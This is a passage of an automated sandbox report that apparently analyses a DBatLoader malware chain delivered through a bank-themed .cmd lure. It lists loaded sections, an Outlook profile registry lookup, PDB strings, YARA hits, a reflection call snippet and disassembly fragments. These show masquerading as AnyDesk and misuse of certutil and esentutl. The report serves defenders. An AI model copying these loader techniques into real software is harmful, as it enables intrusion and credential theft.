                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdStatic file information: File size 3381962 > 1048576
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVClient.pdbGCTL source: Native_neworigin.exe, 00000020.00000003.1761821664.0000000002F20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Native_neworigin.exe, 00000020.00000003.1827211609.0000000005BD0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdbGCTL source: Native_neworigin.exe, 00000020.00000003.1680189794.0000000005130000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000022.00000003.2652969004.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: AppVClient.pdb source: Native_neworigin.exe, 00000020.00000003.1761821664.0000000002F20000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Native_neworigin.exe, 00000020.00000003.1827211609.0000000005BD0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1293644753.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1680776952.0000000002366000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BCB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BFB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1691758562.0000000002ECE000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: _.pdb source: Native_neworigin.exe, 00000020.00000003.1680680146.000000000089E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1948863536.0000000005180000.00000004.08000000.00040000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1941635606.0000000003FBE000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 00000020.00000002.1916978924.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000000.1261759874.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1265745168.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.1288228586.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.1281568871.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1290049580.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1291210071.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000000.1291943838.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000002.1293263855.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000017.00000003.1644060715.0000000005660000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000019.00000002.1650975079.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000000.1654122990.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1778308832.0000000000421000.00000020.00000001.01000000.0000000A.sdmp
                    Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000018.00000003.1647730402.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000001E.00000000.1658726741.0000000000591000.00000020.00000001.01000000.0000000B.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000022.00000003.2553259791.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000022.00000003.2192790900.0000000001540000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: certutil.pdb source: kn.exe, 00000009.00000002.1279659774.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1266250734.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000000.1282363010.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000002.1287164671.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp
                    Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DD46000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1626298740.000000007EE30000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1625211042.000000007DC20000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1771761591.000000007EFA6000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000022.00000003.2192790900.0000000001540000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000022.00000003.2652969004.0000000001460000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ALG.pdb source: Native_neworigin.exe, 00000020.00000003.1680189794.0000000005130000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000000.1261759874.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1265745168.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1280838297.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.1288228586.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.1281568871.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000000.1290049580.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000010.00000002.1291210071.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000000.1291943838.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000011.00000002.1293263855.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmp, esentutl.exe, 00000017.00000003.1644060715.0000000005660000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000019.00000002.1650975079.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001A.00000000.1654122990.0000000000421000.00000020.00000001.01000000.0000000A.sdmp, alpha.pif, 0000001D.00000002.1778308832.0000000000421000.00000020.00000001.01000000.0000000A.sdmp
                    Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000F.00000003.1293644753.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1647644472.000000002215E000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1680776952.0000000002366000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BCB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1647644472.000000002212D000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1682798891.0000000002912000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1731970165.0000000020BFB000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1293907494.000000000291C000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1691758562.0000000002ECE000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000022.00000003.2553259791.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: ping.pdb source: esentutl.exe, 00000018.00000003.1647730402.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000001E.00000000.1658726741.0000000000591000.00000020.00000001.01000000.0000000B.sdmp
                    Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000009.00000002.1279659774.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1266250734.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000000.1282363010.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000E.00000002.1287164671.00007FF7F145E000.00000002.00000001.01000000.00000005.sdmp

                    Data Obfuscation

                    barindex
                    Yara detected DBatLoader
                    Source: Yara matchFile source: 15.2.AnyDesk.PIF.2ea0000.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000003.1293644753.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: 32.3.Native_neworigin.exe.89ece0.17.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 32.2.Native_neworigin.exe.5a20000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 32.2.Native_neworigin.exe.5180f08.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: 32.2.Native_neworigin.exe.3fdc190.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                    Source: alpha.exe.3.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB894C LoadLibraryW,GetProcAddress,FreeLibrary,15_2_02EB894C
                    Source: AnyDesk.PIF.14.drStatic PE information: real checksum: 0x0 should be: 0x13a89c
                    Source: FXSSVC.exe.32.drStatic PE information: real checksum: 0xa20cd should be: 0x133402
                    Source: armsvc.exe.31.drStatic PE information: real checksum: 0x32318 should be: 0x1481e2
                    Source: aymtmquJ.pif.15.drStatic PE information: real checksum: 0x0 should be: 0x1768a
                    Source: Juqmtmya.PIF.27.drStatic PE information: real checksum: 0x0 should be: 0x13a89c
                    Source: Trading_AIBot.exe.31.drStatic PE information: real checksum: 0x0 should be: 0x16b30
                    Source: alpha.exe.3.drStatic PE information: section name: .didat
                    Source: kn.exe.5.drStatic PE information: section name: .didat
                    Source: alpha.pif.23.drStatic PE information: section name: .didat
                    Source: armsvc.exe.31.drStatic PE information: section name: .didat
                    Source: alg.exe.32.drStatic PE information: section name: .didat
                    Source: FXSSVC.exe.32.drStatic PE information: section name: .didat
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1373668 push rsp; ret 9_2_00007FF7F1373669
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02ECD2FC push 02ECD367h; ret 15_2_02ECD35F
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA63AE push 02EA640Bh; ret 15_2_02EA6403
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA63B0 push 02EA640Bh; ret 15_2_02EA6403
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02ECC378 push 02ECC56Eh; ret 15_2_02ECC566
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EAC349 push 8B02EAC1h; ret 15_2_02EAC34E
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EA332C push eax; ret 15_2_02EA3368
